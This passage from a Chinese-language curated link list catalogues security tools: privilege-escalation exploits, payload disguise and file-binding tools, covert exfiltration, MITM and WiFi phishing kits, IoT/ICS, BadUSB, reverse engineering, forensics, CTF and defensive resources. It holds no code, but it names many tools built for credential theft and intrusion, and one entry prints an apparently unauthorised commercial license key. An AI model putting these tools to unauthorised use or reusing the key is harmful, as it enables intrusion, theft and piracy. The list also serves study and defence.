RottenPotatoNG变种,利用NBNS本地域名欺骗和WPAD代理欺骗提权 - https://github.com/ohpe/juicy-potato RottenPotatoNG变种,利用com对象、用户token进行提权 - https://github.com/foxglovesec/Potato RottenPotatoNG变种,利用本地域名欺骗和代理欺骗提权 - https://github.com/DanMcInerney/icebreaker 处于内网环境但又在AD环境之外,icebreaker将会帮助你获取明文Active Directory凭据(活动目录存储在域控服务器可用于提权) - https://github.com/hausec/ADAPE-Script Active Directory权限提升脚本 - https://github.com/klionsec/BypassAV-AllThings 利用aspx一句话配合提权payload提权 - https://github.com/St0rn/Windows-10-Exploit PY\msf插件,win10 uac bypass - https://github.com/euphrat1ca/ms15-051 C++.Windows 内核模式驱动程序中的漏洞可能允许特权提升 (3057191),WS03-08。release。 - https://github.com/sam-b/CVE-2014-4113 利用Win32k.sys内核漏洞进行提取,ms14-058 - https://github.com/unamer/CVE-2018-8120 影响Win32k组件,针对win7和win2008提权 - https://github.com/alpha1ab/CVE-2018-8120 在win7与win2k8的基础上增加了winXP与win2k3 - https://github.com/0xbadjuju/Tokenvator 使用Windows令牌提升权限的工具,提供一个交互命令行界面 - https://github.com/dirkjanm/PrivExchange PY.基于impacket,利用exchange提升system权限。Abusing Exchange: One API call away from Domain。CVE-2019-1040 - https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/ INTRO.CVE-2019-1040利用exchange提权PrivExchange ### 文件捆绑 - http://www.angusj.com/resourcehacker Windows对程序属性的修改,修改图标属性等。 - https://github.com/islamadel/bat2exe VB.将bat文件转换为exe二进制文件。 - https://github.com/tywali/Bat2ExeConverter 将bat文件转换为exe二进制文件 - https://github.com/Juntalis/win32-bat2exe 将bat文件转换为exe二进制文件 - http://www.f2ko.de/downloads/Bat_To_Exe_Converter.zip 将bat文件转换为exe二进制文件,可以隐藏窗口。 - https://github.com/r00t-3xp10it/trojanizer 将两个可执行文件打包为自解压文件,自解压文件在执行时会执行可执行文件 - https://github.com/r00t-3xp10it/backdoorppt 将payload更换图标 - https://github.com/r00t-3xp10it/FakeImageExploiter 将payload更换图标。需要wine与resourcehacker环境 - https://github.com/DamonMohammadbagher/FakeFileMaker 更换图标和名称 - https://github.com/peewpw/Invoke-PSImage PS.将PS脚本隐藏进PNG像素中后上传到web服务器,通过命令加载隐藏在图片里的载荷。1k。NoUpdate。 - https://github.com/deepzec/Bad-Pdf 生成一个pdf文件,内含payload来窃取win上的Net-NTLM哈希 - https://github.com/3gstudent/Worse-PDF 向PDF文件中插入恶意代码,来窃取win上的Net-NTLM哈希 ### 数据取回隐秘传输 - https://github.com/TryCatchHCF/Cloakify 躲避DLP/MLS数据泄露防护系统,突破数据白名单控制,躲避AV检测进行数据盗取 - https://github.com/sensepost/DET 使用单个或多个通道同时执行数据取回 - https://github.com/Arno0x/DNSExfiltrator 利用DNS解析进行数据隐秘传输的工具 - https://github.com/Arno0x/ReflectiveDnsExfiltrator 反射DNS解析隐蔽通道进行数据泄露 - https://github.com/ytisf/PyExfil 用于数据取回的Python软件包 ### 中间人攻击流量劫持 - https://github.com/bettercap/bettercap GO.中间人欺骗,网络攻击以及监控的瑞士军刀。该工具支持多种模块,比如ARP/DNS欺骗、TCP以及数据包代理等.5K.GREATJOB. - https://github.com/mitmproxy/mitmproxy PY.中间人攻击,支持SSL拦截,进行https流量代理。greatjob。15k。 - https://github.com/qiyeboy/BaseProxy PY3.异步http/https代理,楼上简化版。可以作为中间人工具,比如说替换网址图片等 - https://github.com/lgandx/Responder PY.用于嗅探网络内所有的NTLM、NTLMv1/v2、Net-NTLMv1/v2包,对网络内主机进行欺骗获取用户hash。 - https://www.secpulse.com/archives/65503.html INTRO.【脉搏译文系列】渗透师指南之Responder。a拿着b密码请求b,c对a说我是b,然后c获得了b的密码。 - https://github.com/Kevin-Robertson/Inveigh PS.LLMNR / mDNS / NBNS欺骗器和中间人工具 - https://github.com/LionSec/xerosploit 中间人攻击测试工具包 - https://github.com/AlsidOfficial/WSUSpendu 可以自主创建恶意更新,并将其注入到WSUS服务器数据库中,然后随意的分发这些恶意更新 - https://github.com/infobyte/evilgrade 一个模块化的脚本框架,使攻击者在不知情的情况下将恶意更新注入到用户更新中 - https://github.com/quickbreach/smbetray 专注于通过文件内容交换、lnk交换来攻击客户端,以及窃取任何以明文形式传输的数据 - https://github.com/mrexodia/haxxmap 对IMAP服务器进行中间人攻击 - https://github.com/SySS-Research/Seth PY3,BASH。Linux下MitM RDP远程服务中间人攻击 ## 无线安全 - https://github.com/OpenATS/OpenATS C++.无线电卫星天线追踪系统。 ### WIFI中间人攻击 - https://github.com/0v3rl0w/e013 VB.窃取Wifi密码. - https://github.com/cls1991/ng PY.获取你当前连接wifi的密码与ip - https://github.com/wi-fi-analyzer/fluxion 窃取用户wifi密码的进行密码重放攻击 - https://github.com/wifiphisher/wifiphisher PY.中间人攻击,FakeAp恶意热点,WIFI钓鱼,凭证窃取。goodjob。7k - https://github.com/1N3/PRISM-AP 自动部署RogueAP(恶意热点) MITM攻击框架 - https://github.com/sensepost/mana Wifi劫持工具,可以监听计算机或其他移动设备的Wifi通信,并能够模仿该设备 - https://github.com/deltaxflux/fluxion bash,PY.对使用wpa协议的无线网络进行MiTM攻击 - https://github.com/DanMcInerney/LANs.py PY.无线网络劫持ARP欺骗 ### WIFI网络审计测试 - https://www.wifislax.com 西班牙wifi审计系统,国内汉化版为无线革新5.1.1 Wifislax-WRC - https://cn.elcomsoft.com/ewsa.html ewsa,wifi嗅探,握手包密码还原,EWSA-173-HC1UW-L3EGT-FFJ3O-SOQB3 - https://www.passcape.com wifipr,握手包密码还原,另外还有许多商业版windows下密码还原工具 - https://github.com/MisterBianco/BoopSuite 无线网络审计工具,支持2-5GHZ频段 - https://github.com/aircrack-ng/aircrack-ng C.由数据包嗅探器、检测器、WPA / WPA2-PSK 解密器、WEP 和用于 802.11 无线局域网的分析工具组成。1k。 - https://github.com/t6x/reaver-wps-fork-t6x wps跑pin码攻击,常见wifi攻击 - https://github.com/derv82/wifite2 wifite无线审计工具升级版,联动aircrack-ng与reaver - https://github.com/savio-code/fern-wifi-cracker 无线安全审计工具 - https://github.com/P0cL4bs/WiFi-Pumpkin 无线安全渗透测试套件 - https://github.com/entropy1337/infernal-twin 自动化无线攻击工具Infernal-Wireless - https://github.com/m4n3dw0lf/PytheM Python网络/渗透测试工具 - https://github.com/InfamousSYN/rogue 无线网络攻击工具包 - https://github.com/cSploit/android 手机WiFi渗透工具框架,可以使用msf - https://github.com/chrisk44/Hijacker 手机wifi测试工具 - https://andrax-pentest.org/ kali hunter手机渗透测试系统 - https://www.zimperium.com/zanti-mobile-penetration-testing 手机wifi渗透工具 ### WIFI网络防御 - https://github.com/SkypLabs/probequest 嗅探和显示无线网卡附近的Wifi Probe请求 - https://github.com/wangshub/hmpa-pi 在树莓派或路由,利用 Wireshark 扫描附近网络 WiFi 设备,当有手机或其它 Wi-Fi 设备在附近时,通过邮件或者微信提醒 - https://github.com/besimaltnok/PiFinger 检查wifi是否为"Wifi-Pineapple大菠萝"所开放的恶意热点 - https://github.com/WiPi-Hunter/PiSavar 利用PineAP,对于FAKE AP虚假接入点,如"Wifi-Pineapple大菠萝"进行监测 - https://bbs.pediy.com/thread-246627.htm 打造Wi-Fi “DOS”攻击工具——Wi-Fi_deauther。类似大菠萝 - https://github.com/SYWorks/waidps PY.Linux下WiFi网络安全预警工具。 ## IoT物联网安全 - https://github.com/V33RU/IoTSecurity101 IoT工控安全与物联网安全学习的一些文章和资源。文章、搜索引擎工具、博客、视频、ctf靶场、协议包、数据库、固件样本 - https://iot-security.wiki/ 工控安全百科 - http://www.linuxscada.info 工控基础知识 - http://www.freebuf.com/ics-articles 工控相关文章 - https://www.freebuf.com/articles/terminal/203311.html 智能摄像头安全分析及案例参考 - https://www.freebuf.com/news/153580.html 物联网安全研究之一:IoT架构介绍 - http://www.freebuf.com/articles/network/178251.html 工控安全现场实施经验谈之工控系统如何加强主机防护 - https://github.com/hslatman/awesome-industrial-control-system-security 工控系统安全方向优秀资源收集仓库 - https://github.com/adi0x90/attifyos IoT集成安全测试系统,带有一些常用的软件 - http://www.icsmaster.org/archives/ics/942 工控安全工具集 - http://www.freebuf.com/sectool/174567.html 工业控制系统(ICS)安全专家必备的测试工具和安全资源 - https://github.com/SadFud/Exploits PY,BASH.PWN利用框架 CTFs exploit POCs.工控POC - https://github.com/shodan-labs/iotdb nmap配合shodan API扫描IoT设备 - https://github.com/vletoux/SpoolerScanner 检测 Windows 远程打印机服务是否开启的工具 ### 物理HID/BadUsb安全 - https://lr3800.com/2017/01/15/使用电蚊拍diy-usbkill/ USBKiller - https://ducktoolkit.com/ BadUsb、橡皮鸭、HID键盘模拟器 - https://github.com/insecurityofthings/jackit 用于Mousejack的开发代码 - https://github.com/samratashok/Kautilya PS。为人机接口设备提供各种有效负载的工具包 - https://github.com/ebursztein/malusb 创建跨平台的HID欺骗payload,并在Windows和OSX上建立反向TCP-shell - https://github.com/mame82/P4wnP1 在树莓派安装网络劫持键盘注入(WHID)工具 - https://github.com/360PegasusTeam/GhostTunnel 可在隔离环境下使用HID生成隐蔽后门,释放有效负载后删除自身 - https://github.com/0katz/CVE-2019-12476 HID绕过win10登录界面,利用浏览器调用powershell - https://github.com/tenable/router_badusb 利用路由器USE上网口和DHCP协议,使用树莓派连接VPN模拟流量转发进行中间人攻击 - https://lr3800.com/2017/10/18/实战-teensy-烧录间谍-u-盘/ 实战 Teensy 烧录间谍 U 盘 - https://github.com/rawrly/JuiceJacking BASH.JuiceJacking,利用USB等人机接口设备窃取数据 - https://github.com/kenvix/USBCopyer C#.U盘文件自动拷贝usb copy - https://github.com/snovvcrash/usbrip PY.Linux usb设备连接记录追踪。 ### RFID物理设备硬件安全 - https://github.com/mame82/P4wnP1_aloa 在树莓派Raspberry Pi上安装常用的测试组件,打造移动测试平台 - http://www.freebuf.com/news/others/605.html RFID Hacking–资源大合集 - https://www.freebuf.com/geek/195631.html 成为物理黑客吧!利用树莓派实现P4wnP1项目进行渗透测试 - https://github.com/UnicornTeam/HackCube-Special 独角兽实验室硬件渗透测试平台 - https://www.balena.io/etcher/ C.USB Live烧录,rufus。10K. - https://github.com/osqzss/gps-sdr-sim 使用ADALM-Pluto, bladeRF, HackRF, and USRP等软件平台进行GPS信号模拟 - https://github.com/samyk/magspoof 信用卡信息盗取 - https://github.com/knownsec/gsm GO.使用树莓派配合硬件来进行短信转发 - https://github.com/Orange-Cyberdefense/fenrir-ocd 主要功能和用途是绕过有线802.1x保护并使你能够访问目标网络 - https://www.jianshu.com/p/a6927ffe0a20 adb破解安卓锁屏密码。利用recovery对.key文件进行绕过 - https://github.com/RadioWar/NFCGUI C#.图形化NFC协议安全分析工具,主要针对Mifare卡,,基于libnfc完成,支持所有基于PN532芯片解决方案。Ganso稳定版,Pangu加强版。 - https://github.com/LennyLeng/RadioEye RFID配合常见的NFC使用 - https://github.com/Proxmark/proxmark3/ RFID神器PM3 ### 设备固件安全 - https://github.com/w3h/icsmaster 整合工控安全资源。国内外文章、脚本、固件、协议库、数据包、相关工具 - https://blog.attify.com firmware固件安全,IoT安全相关文章 - https://www.pentestpartners.com/security-blog/how-to-do-firmware-analysis-tools-tips-and-tricks/ 固件硬件逆向分析方法技巧 - https://www.jianshu.com/p/3b3df82500b6 绿盟马良:智能设备漏洞挖掘中几个突破点 - http://blog.nsfocus.net/handbook-safety-analysis-intelligent-equipment/ 绿盟:智能设备安全分析手册.pdf - https://paper.seebug.org/613/ 工控漏洞挖掘方法之固件逆向分析 - https://github.com/unprovable/PentestHardware 硬件渗透测试实用手册 - https://github.com/cwerling/psptool PY.分析和解析AMD安全处理器的固件工具包 ### 智能设备安全 - https://github.com/yaseng/iot-security-wiki/ 物联网安全百科。伏宸安全实验 - https://github.com/RUB-NDS/PRET 打印机攻击框架 - https://github.com/rapid7/IoTSeeker 物联网设备默认密码扫描检测工具 - https://github.com/schutzwerk/CANalyzat0r 专有汽车协议的安全分析工具包 - https://github.com/pasta-auto 智能汽车测试 - https://github.com/jgamblin/CarHackingTools 汽车黑客工具箱,汽车信息调查 - https://github.com/jaredthecoder/awesome-vehicle-security 一个用于了解车辆安全和汽车黑客的资源清单 ### 工控设备安全 - https://github.com/moki-ics/moki 一键配置类似kali的工控渗透测试系统的脚本 - https://gitlab.com/expliot_framework/expliot PY3.工控安全漏洞测试框架 - https://github.com/dark-lbp/isf PY2.在routersploit基础开发的工控测试框架 - https://github.com/enddo/smod PY2.使用了scapy模块,主要针对modbus协议测试 - https://github.com/XHermitOne/icscanner 带界面的ics扫描器 - https://github.com/yanlinlin82/plcscan 通过TCP/102和TCP/502识别互联网上PLC设备和其他Modbus设备 - https://github.com/nsacyber/GRASSMARLIN NSA旗下ICS/SCADA态势感知 - https://github.com/nezza/scada-stuff 对 SCADA/ICS设备进行逆向与攻击 ### 摄像头安全 - https://github.com/woj-ciech/kamerka PY.调用shodan API将扫描到的摄像头地理位置,与twitter地理显示在地图上 - https://github.com/Ullaakut/cameradar GO.针对摄像头RTSP协议渗透测试,附弱口令字典 - https://github.com/Ullaakut/camerattack GO.摄像头远程禁用 - https://github.com/NIteshx2/UltimateSecurityCam PY3.摄像头监测外来人员软件,有防欺骗设置 - http://www.dtxiaoting.com 扫描连接的WiFi中摄像头存在情况 ### 路由网关安全 - http://stascorp.com/search/?q=Router+Scan Pascal.RouterScan毛子开发的路由器漏洞利用工具,界面化。GoodJob. - https://github.com/threat9/routersploit PY3.仿msf路由器漏洞框架 - https://github.com/jh00nbr/Routerhunter-2.0 路由器漏洞扫描利用。NoUpdate - https://github.com/googleinurl/RouterHunterBR PHP.路由器设备漏洞扫描利用 - https://github.com/scu-igroup/telnet-scanner Telnet服务密码撞库 - https://github.com/Viralmaniar/Passhunt PY.simple。用于搜索网络设备Web应用程序等的默认凭证。包含523个厂家的2084组默认密码 ## 逆向破解 - https://down.52pojie.cn/ 吾爱破解爱盘工具包。 - https://www.peerlyst.com/posts/resource-learning-how-to-reverse-malware-a-guide 恶意软件逆向指南和工具的集合 - https://github.com/ReFirmLabs/binwalk PY.固件、二进制、pwn等文件自动化识别与逆向,支持多插件配置。goodjob。5k。 - https://github.com/radare/radare2 C.radare2是基于Capstone的跨平台逆向工程平台。包括反汇编、分析数据、打补丁、比较数据、搜索、替换、虚拟化等。10k。goodjob。 - https://github.com/radareorg/cutter C++.基于QT的radare2框架GUI。5k。 - https://github.com/armijnhemel/binaryanalysis-ng PY3.Binary Analysis Toolkit(BAT)。对固件、二进制、pwn等文件进行递归式解压缩实现识别与逆向。goodjob。0.1k。 - https://github.com/angr/angr PY.二进制分析工具,支持动态符号执行和静态分析。3k。 - https://www.hex-rays.com IDA pro反汇编工具。商业版。32位汇编分析调试器ollydbg - https://github.com/x64dbg/x64dbg C++.x64/x32 Windows调试工具。greatjob。34k。 - https://github.com/NationalSecurityAgency/ghidra JAVA.NSA出品的软件逆向动态调试框架Ghidra,堪比商业版IDA - https://github.com/ghidraninja/ghidra_scripts YARA,PY.Ghidra的Binwal\Yara联动插件 - https://github.com/dark-lbp/vxhunter PY.利用IDA Pro 7.x与Ghidra 9.0.1和VxWorks对硬件设备进行调试 ### 程序调试进程管理 - https://www.crystalidea.com/uninstall-tool Windows卸载,软件安装跟踪。商业版。 - https://github.com/processhacker/processhacker 监控系统资源、软件调试、检测恶意软件,管理进程 - https://docs.microsoft.com/en-us/sysinternals/ Windows Sysinternals出品。autorun(自启动)/Process Explorer(加强进程管理)等 - https://github.com/SwiftOnSecurity/sysmon-config Sysmon配置文件。系统进程监控,dns查询。 - https://github.com/DominicBreuker/pspy GO.绕过root权限监控进程运行.GOODJOB. - https://github.com/osquery/osquery C++.跨平台讲系统状态模拟为关系数据库,用sql语句查看运行进程/加载内核模块/网络连接/浏览器插件/硬件事件/文件哈希等。14k。 - https://github.com/kkamagui/shadow-box-for-x86 C.X86架构Linux轻量系统监控 - https://github.com/kkamagui/shadow-box-for-arm C.PY。ARM架构Linux轻量系统监控 - https://osquery.io facebook开源的osquery跨平台系统监控、分析、查询软件 - https://www.cheatengine.org CE(Cheat Engine)是一款内存修改编辑工具,程序函数监控,配合Ultimap功能食用更佳 - http://www.angusj.com/resourcehacker/ 二进制文件浏览编辑 (*.exe; *.dll; *.scr; etc) 和资源文件修改 (*.res, *.mui). - https://github.com/euphrat1ca/PeDoll C++.基于inlineHook技术的软件分析工具,C/S架构 - https://github.com/everdox/InfinityHook C++.挂钩系统调用,上下文切换,页面错误等。 ### 汇编反编译框架 - https://github.com/endgameinc/xori RUST.自定义反汇编框架,PE32, 32+ and shellcode。 - https://github.com/blacknbunny/peanalyzer32 PY3.PE 文件分析和反汇编工具 - https://github.com/aquynh/capstone C.Capstone是一个轻量级的多平台多架构支持的反汇编框架。支持包括ARM,ARM64,MIPS和x86/x64平台。4k。 - https://github.com/joxeankoret/pyew PY.基于Capstone的深度代码分析和文件修改工具。支持PE、ELF、OLE2、PDF等格式,并且支持自定义插件 ### C#/VB/易语言反编译 - https://github.com/icsharpcode/ILSpy C#.针对exe反编译软件。8k。goodjob。 ### Python反编译 - https://sourceforge.net/projects/easypythondecompiler Easy Python Decompiler,支持Python 1.0 - 3.4源码反编译,GUI界面。利用 "Uncompyle2" & "Decompyle++" - http://tools.bugscaner.com/decompyle *.pyc或*.pyo文件在线反编译 - https://github.com/rocky/python-uncompyle6 PY3.支持Python version 1.3 to version 3.7源码反编译 - https://github.com/wibiti/uncompyle2 PY2.针对python2.7源码反编译 - https://github.com/zrax/pycdc C++.全版本python反编译 - https://github.com/countercept/python-exe-unpacker PY.py2exe or pyinstaller打包解压缩 ### Java反编译 - https://github.com/java-decompiler/jd-gui JAVA.java反编译工具。7k。 - https://github.com/skylot/jadx JAVA.jd-gui升级版,反编译出来的代码未格式化。20k。 - https://github.com/deathmarine/Luyten JAVA.格式化java反编译后代码,解决jd的INTERNAL ERROR问题。3k。 ## 移动安全 - https://github.com/Brucetg/App_Security App安全学习资源 - https://github.com/sensepost/objection PY.移动端动态调试安全检测,Frida公司开发。goodjob。 - https://github.com/MobSF/Mobile-Security-Framework-MobSF 软件自动化审计框架,支持docker运行。android、ios、win - https://github.com/mwrlabs/drozer PY.MWR Labs开源Android 安全测试框架,支持编写自定义模块。 - https://github.com/nccgroup/house JS,PY.运行时手机 App 分析工具包, 带Web GUI - https://github.com/nettitude/scrounger PY.Linux下iOS和Android移动应用程序渗透测试框架 - https://github.com/lyxhh/lxhToolHTTPDecrypt js.基于frida/Burp/flask的app渗透测试,利用HTTP协议,识别app加密算法,解密数据包,调用Burp。 ### Android/JAVA安全 - https://github.com/rovo89/Xposed C++.Android动态修改hook,隐藏root执行权限。greatjob。 - https://github.com/asLody/VirtualApp 安卓虚拟机,多开助手 - https://github.com/android-hacker/VirtualXposed 基于VirtualApp 和 epic 在非ROOT环境下运行Xposed模块的实现 - https://github.com/XekriCorp/LeakVM 安卓应用安全测试框架,已下架 - https://www.pd521.com 逆向未来,Android Killer安卓逆向工具 - https://github.com/dweinstein/awesome-frida PY\JAVA.Frida是一款通过JavaScript代码注入应用程序的跨平台hook框架。GOODJOB。 - https://github.com/pxb1988/dex2jar JAVA. android .dex and java .class 文件逆向反编译 - https://github.com/iBotPeaches/Apktool java.Android逆向apk反编译工具.8K. - https://github.com/zsdlove/ApkVulCheck PY3.安卓apk后进行特征值匹配,不是很好用 - https://github.com/jboss-javassist/javassist JAVA.能够操作字节码框架,通过它我们能很轻易的修改class代码文件。2.2K - https://github.com/UltimateHackers/Diggy bash,apktool反编译后正则匹配从 Apk 文件中提取 URLs 的工具。simple - https://github.com/programa-stic 基于Androguard 及Static Android Analysis Framework 的Android App静态分析引擎。 - https://github.com/WooyunDota/DroidSSLUnpinning 安卓证书锁定解除的工具 ### IOS与macOS安全 - https://github.com/dmayer/idb RUBY.开源的iOS App安全评估工具,作者是Danl A.Mayer。 - https://github.com/mwrlabs/needle PY.MWR Labs开发的一个开源iOS安全测试框架,同样支持开发自定义模块来扩展Needle的功能,目前主要功能包含对iOS应用数据存储,IPC.网络通信,静态代码分析,hooking及二进制文件防护等方面的安全审计。 - https://github.com/GeoSn0w/OsirisJailbreak12 IOS12不完全越狱 - https://github.com/chaitin/passionfruit iOS应用逆向与分析工具,可以大大加速iOS应用安全分析过程 - https://sukarodo.me/gr00t/ IOS12全版本越狱工具 - https://github.com/samyk/frisky 针对 ios/macOS 应用的嗅探/修改/逆向/注入等工具 - https://github.com/LinusHenze/Keysteal C++.窃取MacOS下KeyChain。CVE-2019-8526 - https://github.com/coffeehb/Some-PoC-oR-ExP/blob/master/check_icmp_dos.py CVE-2018-4407,macos/ios缓冲区溢出可导致系统崩溃 ## 数字取证 - https://www.audacityteam.org/ 音频文件和波形图处理工具 - http://www.sweetscape.com/010editor/ 识别不同文件格式(模板)的16进制编辑器,具有文件修复功能 - https://github.com/redaelli/imago-forensics PY2.将照片中Exif、MIME等信息提取存入CSV/sqlite中 - http://www.magicexif.com/ 将照片图像中的exif信息数据化 - http://mediaarea.net/MediaInfo 类似exiftool来查看内容区域和元数据信息 - https://www.sno.phy.queensu.ca/~phil/exiftool/ 检查图像文件的exif元数据 - https://www.gimp.org/ Gimp提供了转换各类图像文件可视化数据的功能,还可以用于确认文件是否是一个图像文件 - https://github.com/davidmcgrew/joy 用来捕获和分析内外网流量数据的包,主要用于进行网络调查、安全监控和取证 - http://qpdf.sourceforge.net/ 查看pdf文件并整理提取信息 - http://zipinfo.com/ 在无需提取的情况下列出了zip文件的内容信息 - http://f00l.de/pcapfix/ pcap文件修复 - https://github.com/USArmyResearchLab/Dshell 可扩展的网络取证分析框架,支持快速开发插件与解析网络数据包捕获 - https://github.com/abrignoni/DFIR-SQL-Query-Repo 收集用于数据取证的SQL查询模板 - https://polytechnic.purdue.edu/facilities/cybersecurity-forensics-lab/tools FileTSAR大规模的数据调查取证 ### 计算机设备取证 - https://www.cgsecurity.org/wiki/TestDisk 磁盘分区修复 - https://github.com/decalage2/oletools PY.用于分析MS OLE2文件(结构化存储,复合文件二进制格式)和MS Office文档 - https://www.xplico.org/download 内存取证 - https://github.com/google/bochspwn-reloaded Bochspwn Reloaded(内核信息泄漏检测)工具 - https://github.com/comaeio/LiveCloudKd C.针对Hyper-V的内存取证 - https://github.com/sevagas/swap_digger 针对 Linux swap 进行取证分析的工具 - http://extundelete.sourceforge.net/ linux下的文件恢复 - https://github.com/volatilityfoundation/volatility windows内存取证分析 - https://github.com/gleeda/memtriage Windows内存取证分析 - https://github.com/SekoiaLab/Fastir_Collector Windows取证/信息收集,不限于内存,注册表,文件信息等 - https://github.com/Viralmaniar/Remote-Desktop-Caching- PY.RDP信息复原,png图片格式 ### 移动设备取证 - https://github.com/viaforensics/android-forensics 安卓取证App和框架,可以对安卓设备内各种信息进行提取 - https://www.freebuf.com/articles/rookie/195107.html 记一次微信数据库解密过程。微信的加密数据库的解密密码是由“设备的IMEI(MEID)+用户的uin,进行MD5,然后取其前7位小写字母”构成的 - https://www.freebuf.com/news/193684.html iOS取证技巧:在无损的情况下完整导出SQLite数据库 ## CTF相关(Capture The Flag) - https://ctftime.org CTF排名比赛介绍 - https://ctf-wiki.github.io/ctf-wiki/ CTFwiki,Misc/Crypto/Web/Assembly/Executable/Reverse/Pwn/Android/ICS - https://firmianay.gitbooks.io/ctf-all-in-one CTF-All-In-One 《CTF 竞赛入门指南》。西电信安协会 - https://www.butian.net/School 补天培训。CTF/攻防/硬件/社工/开发/代码审计。goodjob - https://github.com/adon90/pentest_compilation ctf比赛与OSCP考试中常见的知识点和命令 - https://github.com/Hacker0x01/hacker101 RUBY.hacker one联名的Web攻防教学,有ctf靶场和视频.10K - https://github.com/hongriSec/CTF-Training 收集各大CTF比赛的题目和Writeup - https://github.com/balsn/ctf_writeup CTF writeups from Balsn ### CTF靶场平台 - https://github.com/facebook/fbctf HACK,PHP.CTF比赛平台搭建。 - https://github.com/zhl2008/awd-platform AWD攻防比赛平台 - https://github.com/gabemarshall/microctfs SHELL,JS.小型ctf镜像docker - https://github.com/giantbranch/pwn_deploy_chroot PY.部署多个pwn题到一个docker容器中 - https://github.com/PELock/CrackMeZ3S-CTF-CrackMe-Tutorial C++.为CTF比赛编写CrackMe软件 ### CTF杂项 - https://github.com/zardus/ctf-tools ctf工具集 - https://github.com/bugsafe/WeReport PHP.WeReport报告助手,一键生成测试报告。 - https://github.com/0Chencc/CTFCrackTools kotlin与java.CTF工具框架,支持Crypto,Mis等。后期以编写python插件增强功能 - https://www.wishingstarmoye.com/ctf/autokey CTF在线工具集合。密码/隐写/二维码/哈希/编码/激战2???/ - https://github.com/guyoung/CaptfEncoder Node.js.基于Electron。跨平台网络安全工具套件,提供网络安全相关编码转换、古典密码、密码学、特殊编码等工具,并聚合各类在线工具。 - https://github.com/Wfzsec/awd_attack_framework PHP.AWD(Attack With Defense,攻防兼备)常用脚本+不死马+crontab+防御方法 ### CTF二进制pwn利用 - https://github.com/Gallopsled/pwntools PY.pwn类型,二进制利用框架 - https://github.com/ChrisTheCoolHut/Zeratool PY.pwn类型,二进制利用框架 - https://github.com/ChrisTheCoolHut/Rocket-Shot PY.pwn,自动攻击脚本 ### CTF隐写术 - https://www.freebuf.com/sectool/208781.html 将任意文本隐藏在音频视频图片和文本中的多种方式 - https://0xrick.github.io/lists/stego/ 隐写术工具集,Steganography - A list of useful tools and resources。包括隐写工具,解析工具 - https://github.com/DominicBreuker/stego-toolkit 隐写工具包。Stegosuite - http://www.caesum.com/handbook/Stegsolve.jar Java.图片隐写查看器,多图层查看器 # 安全防护相关 - https://github.com/Bypass007/Safety-Project-Collection 收集一些比较优秀的开源安全项目,以帮助甲方安全从业人员构建企业安全能力。welljob。 - https://www.veracrypt.fr C.2K。类似BitLocker全盘加密,支持磁盘隐藏分区。 - https://github.com/baidu/AdvBox Advbox是支持多种深度学习平台的AI模型安全工具箱,既支持白盒和黑盒算法生成对抗样本,衡量AI模型鲁棒性,也支持常见的防御算法 - https://github.com/quoscient/octopus 区块链智能合约安全分析工具 - https://github.com/trimstray/otseca linux系统审计工具,可以导出系统配置,生成报表 - https://github.com/BugScanTeam/DNSLog 一款基于django监控 DNS 解析记录和 HTTP 访问记录的工具,可以配合盲注、xss、解析对方真实ip使用 - https://github.com/mwrlabs/dref DNS 重绑定利用框架 - https://github.com/chengr28/Pcap_DNSProxy/blob/master/README.zh-Hans.md Pcap_DNSProxy 是一个基于 WinPcap/LibPcap 用于过滤 DNS 投毒污染的工具 - https://github.com/PlagueScanner/PlagueScanner 使用python实现的集成ClamAV、ESET、Bitdefender的反病毒引擎 - https://github.com/m4rco-/dorothy2 一款木马、僵尸网络分析框架 - http://github.com/jumpserver/jumpserver 基于 Python3 的开源堡垒机 - https://github.com/github/glb-director 负载均衡组件GLB,数据解析使用了dpdk - https://github.com/TKCERT/mail-security-tester 检测邮件防护与过滤系统的测试框架 - https://github.com/chaitin/sqlchop-http-proxy 利用HTTP 反向代理,内置 SQLChop 作为 SQL 注入攻击检测模块,可以拦截 SQL 注入流量而放行正常流量 - https://github.com/OWASP/SecureTea-Project 当有人私自触碰电脑鼠标或触摸板,进行报警 - https://github.com/openitsystem/itops PY3\DJANGO.AD\Exchange管理系统 - https://github.com/tmobile/pacbot JAVA.云平台自动化安全监控工具 ### 代码审计应用测试 - https://www.joinfortify.com Fortify SCA是HP出品的静态白盒软件源代码安全测试工具。商业版。goodjob。 - https://github.com/wufeifei/cobra PY.源代码安全审计,支持PHP、Java等开发语言,并支持数十种类型文件。 - https://github.com/euphrat1ca/SeaySourceCodeCheck C#.PHP代码审计,法师Seay源代码审计系统2.1版本 - https://github.com/OneSourceCat/phpvulhunter 静态php代码审计 - https://github.com/ripsscanner/rips php.php代码审计工具 - https://github.com/Qihoo360/phptrace 跟踪、分析PHP运行情况的工具 - https://github.com/m4ll0k/WPSploit Wordpress插件代码安全审计 - https://github.com/elcodigok/wphardening 加强任何WordPress安装的安全 - https://github.com/RetireJS/grunt-retire js.js扩展库漏洞扫描 - https://github.com/ctxis/beemka 针对Electron App的漏洞利用工具包 - https://github.com/doyensec/electronegativity Electron应用代码审计,App的错误配置和安全问题 - https://github.com/pyupio/safety 检查所有已安装 Python包,查找已知的安全漏洞 - https://github.com/shengqi158/pyvulhunter Python应用审计 - https://github.com/PyCQA/bandit PY.python代码安全漏洞审计 - https://github.com/python-security/pyt 用于检测Python Web应用程序中的安全漏洞的静态分析工具 - https://github.com/securego/gosec Go 语言源码安全分析工具 - https://github.com/GoSSIP-SJTU/TripleDoggy C.c/c++/object-c源代码检测框架,支持接口调用 - https://github.com/ga0/pyprotect 给python代码加密,防止逆向 - https://github.com/presidentbeef/brakeman Ruby on Rails应用静态代码分析 - https://github.com/pumasecurity/puma-scan C#.Visual Studio插件,实时代码审计 ### 大数据平台安全 - https://github.com/shouc/BDA 针对hadoop/spark/mysql等大数据平台的审计与检测 - https://github.com/wavestone-cdt/hadoop-attack-library hadoop测试方式和工具集 ## 欺骗防御 - https://github.com/paralax/awesome-honeypots 蜜罐开源技术收集 - https://github.com/Cymmetria 欺骗防御公司。Struts2、weblogic、telnet、Cisco ASA、Micros等仿真蜜罐,honeycomb低交互蜜罐框架 - https://www.freebuf.com/sectool/204652.html 基于EVE-NG平台上构建企业内网攻防环境 - https://www.bamsoftware.com/hacks/zipbomb/ ZIPBOMB压缩包炸弹 ### 蜜罐安全 - https://github.com/phage-nz/malware-hunting PY.利用蜜罐进行恶意文件捕获。包含众多蜜罐使用说明 - https://github.com/threatstream/mhn PY.现代蜜网,集成了多种蜜罐的安装脚本,可以快速部署、使用,也能够快速的从节点收集数据 - https://github.com/dtag-dev-sec/tpotce 